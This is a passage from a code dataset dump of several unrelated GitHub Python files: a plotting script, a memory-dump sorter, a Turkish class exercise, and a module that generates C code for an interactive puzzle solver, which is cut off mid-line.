c\n","repo_name":"taiyeoguns/flask-api-trial","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11123171399","text":"#!/usr/bin/env python\nimport json\nimport matplotlib.pyplot as plt\nfrom numpy import *\n\ndef printout(x, y, label):\n plt.plot(x, y, label=label)\n\n\ndef split(array):\n result = []\n for d in array:\n for i in range(len(d)):\n if len(result) < i + 1:\n result.append([])\n else:\n result[i].append(d[i])\n return result\n\n\nwith open('results', 'r') as f:\n results = json.loads(''.join(f.readlines()))\n\n\nfor s, data in results.items():\n # max_iter = max([i for i, _, _ in data])\n for i in data:\n avrg = mean([j[1] for j in data[i]])\n if avrg:\n printout(i, avrg, '%s-%s' % (s, i))\n # for i in range(1, max_iter + 1):\n # ret = split([[ii, jj, kk] for ii, jj, kk in data if ii == i])\n # if ret:\n #\n # printout(ret[1], ret[2], '%s-%s' % (s, i))\n\n\nplt.legend()\nplt.xlabel('batch size')\nplt.ylabel('elapsed time')\nplt.title(\"test\")\nplt.show()\n\n\n\nimport json\n\nif __name__ == '__main__':\n path = \"/tmp/pyrasite-2038673-objects.json\"\n ans = []\n with open(path, 'r') as f:\n for l in f:\n if l:\n try:\n i = json.loads(l)\n # if i['type'] == 'dict':\n ans.append(i)\n except Exception as e:\n print(i)\n\n ans = sorted(ans, key=lambda x: -x['size'])\n with open(\"ans.json\", 'w') as f:\n for i in ans:\n f.write(\"%s \\n\" % (i))","repo_name":"zhen00fa/script-tools","sub_path":"python/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20645733792","text":"class Ders:\n def __init__(self, isim):\n self.isim = isim\n\nclass Ogrenci():\n def __init__(self, isim, soyisim):\n self.isim = isim\n self.soyisim = soyisim\n self.dersler = []\n\n def isim_soyisim(self):\n return self.isim + \" \" + self.soyisim\n\n\nogrenci_isim = input(\"Öğrenci adı giriniz: \")\nogrenci_soyisim = input(\"Öğrenci soyadı giriniz: \")\n\nogrenci = Ogrenci(ogrenci_isim, ogrenci_soyisim)\n\nprint(\"\\n Alabileceğiniz dersler: Matematik, Fizik, Biyoloji, Edebiyat, Kimya\\n\")\n\nders_sayisi = 0\ndersler = []\n\nwhile ders_sayisi < 2:\n ders_isim = input(\"Ders ismi giriniz: \")\n ders = Ders(ders_isim)\n dersler.append(ders_isim)\n ders_sayisi += 1\n\nprint(\"\\n\", ogrenci.isim, ogrenci.soyisim)\n\nprint(dersler)\n\n\n","repo_name":"ilteriskeskin/lyk2017-Python-Example","sub_path":"class/deneme_class5.py","file_name":"deneme_class5.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"11843913780","text":"# Global Libs\nimport os\nimport sys\nimport time\nimport datetime\nimport select\nimport random\nimport multiprocessing\nimport itertools\nimport ctypes\nimport signal\nimport re\nimport json\n\nimport png\nimport math\n\n# Local Libs\nimport defs\nimport puzzle\nimport scenarios\nimport data\nimport external_libs\n\nimport thread_bp_hb\n#import thread_lca\n#import thread_wfn\nimport thread_bp_input\n\n\nclass LibBigPicture( external_libs.External_Libs ):\n\t\"\"\"Defines exploration\"\"\"\n\n\tMACROS_NAMES_A = [ \"utils\", \"generate\", \"main\" ]\n\tMACROS_NAMES_B = [ ]\n\n\tCOMMANDS = {}\n\tCOMMANDS_LIST = 
[\n\t\t\t\t'CLEAR_SCREEN',\n\t\t\t\t'SHOW_TITLE',\n\t\t\t\t'SHOW_HEARTBEAT',\n\t\t\t\t'SHOW_STATS',\n\t\t\t\t'SHOW_HELP',\n\n\t\t\t\t'LEAVE_CPU_ALONE',\n\t\t\t\t'TIME_TO_FINISH',\n\t\t\t]\n\n\tFLAGS = [\n\t\t\t[ \"Time to finish\",\t\t\"time_to_finish\",\t\t\"TTF\" ],\n\t\t\t[ \"Leave CPU alone\",\t\t\"leave_cpu_alone\",\t\t\"LCA\" ],\n\t\t\t[ \"Pause\",\t\t\t\"pause\",\t\t\t\"Pause\" ],\n\t\t\t[ \"Wait for Notification\",\t\"wait_for_notification\",\t\"WFN\" ],\n\t\t\t[ \"Send a Notification\",\t\"send_a_notification\",\t\t\"SFN\" ],\n\t\t\t[ \"Time Heartbeat\",\t\t\"heartbeat\",\t\t\t\"HB\" ],\n\t\t\t[ \"Max number of heartbeats\",\t\"heartbeat_limit\", \t\t\"HBLimit\" ],\n\t\t\t[ \"Check for Commands\",\t\t\"check_commands\",\t\t\"CheckCommands\" ],\n\t\t\t[ \"Commands for Interactivity\",\t\"commands\",\t\t\t\"Commands\" ],\n\t\t\t[ \"Show help\",\t\t\t\"help\",\t\t\t\t\"Help\" ],\n\t\t\t[ \"Max Depth Seen\",\t\t\"best_depth_seen\",\t\t\"BestDepthSeen\" ],\n\t\t\t[ \"Seed\",\t\t\t\"seed\",\t\t\t\t\"Seed\" ],\n\t\t]\n\n\tSTATS =\t[\n\t\t\t(\"StatsAllocate\", \"stats_allocate\", \"allocation\", \"STATS_ALLOCATE\"),\n\t\t\t(\"StatsCopy\", \"stats_copy\", \"copies\", \"STATS_COPY\"),\n\t\t\t(\"StatsFilterValidPieces\", \"stats_filter_valid_pieces\", \"filter valid_pieces\", \"STATS_FILTER_VALID_PIECES\"),\n\t\t\t(\"StatsFixPieces\", \"stats_fix_pieces\", \"fix piece\", \"STATS_FIX_PIECES\"),\n\n\t\t\t(\"StatsFilterValidPiecesRemoved\", \"stats_filter_valid_pieces_removed\", \"removed\", \"STATS_FILTER_VALID_PIECES_REMOVED\"),\n\t\t\t(\"StatsFilterValidPiecesDeadEnd\", \"stats_filter_valid_pieces_dead_end\", \"dead ends\", \"STATS_FILTER_VALID_PIECES_DEAD_END\"),\n\t\t\t(\"StatsFixPiecesDeadEnd\", \"stats_fix_pieces_dead_end\", \"dead ends\", \"STATS_FIX_PIECES_DEAD_END\"),\n\t\t]\n\n\tARRAYS = STATS + [\n\t\t\t(\"NodesHeartbeat\", \"nodes_heartbeat\", \"heartbeats\", \"NODES_HEARTBEAT\"),\n\t\t]\n\n\tpuzzle = None\n\tvalid_pieces_depth = None\n\n\t# ----- Init the puzzle\n\tdef __init__( self, puzzle, extra_name=\"\", skipcompile=False ):\n\t\t\"\"\"\n\t\tInitialize\n\t\t\"\"\"\n\t\tself.name = \"libbigpicture\"\n\n\t\tself.puzzle = puzzle\n\t\t\n\t\t# Add to the commands the arrays\n\t\tfor (fname, vname, uname, flag) in self.ARRAYS:\n\t\t\tself.COMMANDS_LIST.append( \"SHOW_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"ZERO_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"ZERO_TOTAL_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"SHOW_RESULT_\"+flag )\n\n\n\t\tself.COMMANDS[ \"NONE\" ] = 0\n\t\ti = 0\n\t\tfor c in self.COMMANDS_LIST:\n\t\t\tself.COMMANDS[ c ] = 1<<i\n\t\t\ti += 1\n\n\t# ----- Handle the commands coming from the input thread\n\tdef command_handler( self, commands ):\n\t\tif self.DEBUG > 2:\n\t\t\tprint( \"Commands received: ]\", commands, \"[\" )\n\t\t\tprint( \"global_bigpicture:\", self.global_bigpicture )\n\t\t\tfor (c, n, s) in self.FLAGS:\n\t\t\t\tf = getattr( self.LibExt, \"get\"+s )\n\t\t\t\tprint( \"get\"+s+\" \"+str(f( self.global_bigpicture ))+\" | \"+c )\n\n\t\tcommand_found = False\n\n\t\tfor command in commands:\n\t\t\tif command in [ \"c\", \"cls\", \"clear_screen\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'CLEAR_SCREEN' ] )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"\", \"print\", \"cc\", \"check_commands\" ]:\n\t\t\t\tself.LibExt.setCheckCommands( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"n\", \"next\" ]:\n\t\t\t\tself.LibExt.setHB( self.global_bigpicture, 10000000 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"0\", \"000\" ]:\n\t\t\t\tself.LibExt.clearHB( self.global_bigpicture 
)\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"hb\", \"heartbeat\" ]:\n\t\t\t\tlca = self.LibExt.getLCA( self.global_bigpicture )\n\t\t\t\tpause = self.LibExt.getPause( self.global_bigpicture )\n\t\t\t\tif (lca == 0) or (pause == 0):\n\t\t\t\t\tself.LibExt.incHB( self.global_bigpicture )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"s\", \"stats\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'SHOW_STATS' ] )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"p\", \"pause\", \"lca\" ]:\n\t\t\t\tself.LibExt.togglePause( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"w\", \"sfn\" ]:\n\t\t\t\tself.LibExt.setSFN( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"q\", \"quit\", \"exit\" ]:\n\t\t\t\tif self.DEBUG > 0:\n\t\t\t\t\tprint('x-]'+self.XTermInfo+' TTF '+self.XTermNormal+'[-x')\n\t\t\t\tself.LibExt.setTTF( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\n\t\t\telif command in [ \"h\", \"help\", \"?\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'SHOW_HELP' ] )\n\t\t\t\tcommand_found = True\n\n\t\t\tif not command_found:\n\t\t\t\tfor (fname, vname, uname, flag) in self.ARRAYS:\n\t\t\t\t\tif command in [ \"SHOW_\"+flag, \"ZERO_\"+flag, \"ZERO_TOTAL_\"+flag, \"ZERO_END_\"+flag ]:\n\t\t\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ command ] )\n\t\t\t\t\t\tcommand_found = True\n\n\t\tif command_found:\n\t\t\tself.LibExt.setCheckCommands( self.global_bigpicture, 1 )\n\n\n\t# ----- Generate command functions\n\tdef gen_do_commands( self, only_signature=False ):\n\n\t\toutput = []\n\n\t\tfor prefix in [ \"\", \"s\", \"f\" ]:\n\n\t\t\tif prefix == \"\":\n\t\t\t\tout = \"\"\n\t\t\telif prefix == \"s\":\n\t\t\t\tout = \"s_out,\"\n\t\t\telif prefix == \"f\":\n\t\t\t\tout = \"f_out,\"\n\n\t\t\toutput.extend( [ \n\t\t\t\t(0, \"void \"+prefix+\"do_commands(\"),\n\t\t\t\t(1, \"charp s_out,\" if (prefix == \"s\") else \"\" ),\n\t\t\t\t(1, \"FILE * f_out,\" if (prefix == \"f\") else \"\" ),\n\t\t\t\t(1, \"p_bigpicture b\"),\n\t\t\t\t] )\n\n\t\t\tif only_signature:\n\t\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\t\tcontinue\n\t\t\t\n\t\t\toutput.extend( [\n\t\t\t\t(1, \") {\"),\n\t\t\t\t(1, '' ),\n\t\t\t\t(1, 'uint64 i, s;' ),\n\t\t\t\t(1, '' ),\n\n\t\t\t\t# GENERAL COMMANDS\n\t\t\t\t(1, 'if (b->commands & CLEAR_SCREEN)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"'+self.XTermClearScr+'\" );' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_TITLE)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n' + self.H1_OPEN + self.puzzle.TITLE_STR + self.H1_CLOSE + '\\\\n\\\\n\" );' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_HEARTBEAT)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"Heartbeats: %llu/%llu\\\\n\", b->heartbeat, b->heartbeat_limit);' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_STATS) {' ),\n\t\t\t\t] )\n\n\t\t\tfor (fname, vname, uname, flag) in self.STATS:\n\t\t\t\toutput.append( (2, prefix+'printf( '+out+' \"'+uname+': %llu\\\\n\", b->'+vname+');' ), )\n\n\t\t\toutput.extend( [\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n\");' ),\n\t\t\t\t(1, '}' ),\n\t\t\t\t] )\n\n\n\n\n\t\t\tfor (fname, vname, uname, flag) in self.STATS:\n\t\t\t\tvtname = vname.replace(\"stats_\", \"stats_total_\")\n\n\t\t\t\toutput.extend( [\n\t\t\t\t(1, 'if (b->commands & SHOW_'+flag+') {' ),\n\t\t\t\t#(2, prefix+'print'+fname+'( '+out+' b );' if self.puzzle.scenario.STATS else 
\"\"),\n\t\t\t\t#(2, 'printf( \"Total '+vname+' = %llu\\\\n\", b->'+vtname+' );' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if ((b->commands & SHOW_RESULT_'+flag+')&&(b->time_to_finish)) {' ),\n\t\t\t\t#(2, prefix+'print'+fname+'_for_stats_by_depth( '+out+' b );' if self.puzzle.scenario.STATS else \"\"),\n\t\t\t\t#(2, 'printf( \"'+vname+' = %llu (avg = %llu)\\\\n\", b->'+vtname+', b->'+vtname+' / b->heartbeat );' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t#(1, 'if (b->commands & ZERO_'+flag+')' ),\n\t\t\t\t##(2, 'for(i=0;i'+vtname+' += b->'+vname+'[i]; b->'+vname+'[i] = 0; }' ),\n\t\t\t\t#(2, 'for(i=0;i'+vname+'[i] = 0; }' if self.puzzle.scenario.STATS else \"\"),\n\t\t\t\t#(0, '' ),\n\n\t\t\t\t#(1, 'if (b->commands & ZERO_TOTAL_'+flag+')' ),\n\t\t\t\t#(2, 'b->'+vtname+' = 0;' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t#(0, '' ),\n\t\t\t\t] )\n\n\n\n\t\t\toutput.extend( [\n\t\t\t\t# HELP\n\t\t\t\t(1, 'if (b->commands & SHOW_HELP) {' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \"'+self.H1_OPEN+\"List of commands\"+self.H1_CLOSE+'\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > 0 | reset heartbeat\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > hb | one heartbeat\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > c | cls\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > w | send notification\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > n | next\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > p | pause\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > n | next\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > s | save\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > q | quit\\\\n\");'),\n\n\t\t\t\t(2, (prefix+'printf( '+out+' \"\\\\n Stats:\\\\n'+ \"\".join([\n\t\t\t\t\t\" > \"+format(\"SHOW_\"+flag, \"45\")+\n\t\t\t\t\t\" > \"+format(\"ZERO_\"+flag, \"45\")+\n\t\t\t\t\t\" > \"+format(\"ZERO_TOTAL_\"+flag, \"45\")+\"\\\\n\" \n\t\t\t\t\tfor (fname, vname, uname, flag) in self.ARRAYS])+'\\\\n\");') if self.puzzle.scenario.STATS or self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t#(2, 'b->commands &= ~SHOW_HELP;' ),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\t\t\t\t(0, '' ),\n\n\n\t\t\t\t] )\n\n\t\t\toutput.extend( [\n\t\t\t\t(0, '}' ),\n\t\t\t\t(0, '' ),\n\t\t\t\t] )\n\t\n\t\treturn output\n\n\n\n\t# ----- Generate get time to finish\n\tdef gen_getter_setter_function( self, only_signature=False ):\n\n\t\toutput = []\n\t\tfor (c, n, s) in self.FLAGS:\n\n\t\t\toutput.append( (0, \"// \"+c+\" functions\"), )\n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void clear\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = 0;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on clear'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"uint64 get\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) return ((p_bigpicture)b)->'+n+';'), ) \n\t\t\t\toutput.append( (2, 'DEBUG_PRINT((\"NULL on get'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (2, 'return 0;'), ) 
\n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void set\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on set'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void or\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' |= v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on or'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void xor\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' ^= v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on xor'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void inc\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' ++;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on inc'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void dec\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' --;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on dec'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void toggle\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = ~((p_bigpicture)b)->'+n+';'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on toggle'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\treturn output\n\n\t# ----- Allocate bigpicture memory\n\tdef gen_allocate_bigpicture_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_bigpicture allocate_bigpicture(\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, \"p_bigpicture b;\") )\n\t\toutput.append( (1, \"uint64 i;\") )\n\t\toutput.append( (0, \"\") )\n\t\t#output.append( (1, 'DEBUG3_PRINT((\"Allocate Blackwood\\\\n\" ));'), )\n\t\toutput.append( (1, 'b = (p_bigpicture)calloc(1, sizeof(t_bigpicture));') )\n\n\t\tfor (c, n, s) in 
self.FLAGS:\n\t\t\toutput.append( (1, \"b->\"+n+\" = 0;\") )\n\n\t\toutput.extend( [\n\t\t\t(1, 'return b;'), \n\t\t\t(0, '}' ),\n\t\t\t] )\n\t\t\t\n\t\treturn output\n\n\t# ----- Free bigpicture memory\n\tdef gen_free_bigpicture_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_bigpicture free_bigpicture(\"),\n\t\t\t(1, \"p_bigpicture b\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, 'free(b);') )\n\t\toutput.append( (1, 'return NULL;') )\n\t\toutput.append( (0, '}') )\n\t\treturn output\n\n\t# ----- Get Static Valid Pieces\n\tdef gen_get_static_valid_pieces_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_piece_full get_static_valid_pieces(\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, 'return static_valid_pieces;') )\n\t\toutput.append( (0, '}') )\n\t\treturn output\n\n\t# ----- Generate print functions\n\tdef gen_PrintValidPieces_functions( self, only_signature=False ):\n\n\t\toutput = []\n\n\t\tuname = \"pieces\"\n\n\t\tW=self.puzzle.board_w\n\t\tH=self.puzzle.board_h\n\t\tWH=self.puzzle.board_wh\n\n\t\tfor prefix in [ \"\", \"s\", \"f\" ]:\n\n\t\t\tif prefix == \"\":\n\t\t\t\tout = \"\"\n\t\t\telif prefix == \"s\":\n\t\t\t\tout = \"s_out,\"\n\t\t\telif prefix == \"f\":\n\t\t\t\tout = \"f_out,\"\n\n\t\t\t# ----------------------------------\n\t\t\tfor dest in [ \"\", \"_for_stats\" ]:\n\n\t\t\t\toutput.extend( [ \n\t\t\t\t\t(0, \"void \"+prefix+\"PrintValidPieces\"+dest+\"(\"),\n\t\t\t\t\t(1, \"charp s_out,\" if (prefix == \"s\") else \"\" ),\n\t\t\t\t\t(1, \"FILE * f_out,\" if (prefix == \"f\") else \"\" ),\n\t\t\t\t\t(1, \"t_piece_full * valid_pieces\"),\n\t\t\t\t\t] )\n\n\t\t\t\tif only_signature:\n\t\t\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\toutput.extend( [\n\t\t\t\t\t(1, \") {\"),\n\t\t\t\t\t(1, \"uint64 space, x, y, piece_index;\"),\n\t\t\t\t\t(1, \"int64 count, total;\"),\n\t\t\t\t\t(1, \"uint64 space_count[WH];\"),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t(1, 'if (valid_pieces == NULL) {' ),\n\t\t\t\t\t(2, 'printf(\"NULL: Nothing to print\\\\n\");' ),\n\t\t\t\t\t(1, 'return;' ),\n\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t(1, 'total = 0;' ),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t(1, 'for (space = 0; space < WH; space++) {' ),\n\t\t\t\t\t(2, 'space_count[space] = 0;' ),\n\t\t\t\t\t(2, 'while (valid_pieces[space*WH*4+space_count[space]].u != 0xff) { space_count[space]++; }' ),\n\t\t\t\t\t(2, 'total += space_count[space];' ),\n\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t] )\n\n\t\t\t\tif dest == \"\":\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, 'if (count <= 0) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\" . 
\" );' ),\n\t\t\t\t\t\t] )\n\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, '} else if (count < 1000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"'+self.verdoie +\"%3llu\"+self.XTermNormal+' \", count/1);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.jaunoie +\"%3llu\"+self.XTermNormal+' \", count/1000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.rougeoie+\"%3llu\"+self.XTermNormal+' \", count/1000000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.violoie +\"%3llu\"+self.XTermNormal+' \", count/1000000000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.bleuoie +\"%3llu\"+self.XTermNormal+' \", count/1000000000000);' ),\n\t\t\t\t\t\t] )\n\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(3, '} else {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"%3llu \", count);' ),\n\t\t\t\t\t\t(3, '}' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, 'if (total == 0) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: . '+uname+'\\\\n\\\\n\" );' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.verdoie +\"%3llu\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.jaunoie +\"%3lluK\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.rougeoie+\"%3lluM\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.violoie +\"%3lluG\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.bleuoie +\"%3lluT\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000000000);' ),\n\t\t\t\t\t\t(1, '} else {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: %3llu '+uname+'/s\\\\n\\\\n\", total);' ),\n\t\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t\t])\n\n\t\t\t\telif dest == \"_for_stats\":\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, prefix+'printf( '+out+'\"%llu \", count);' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( 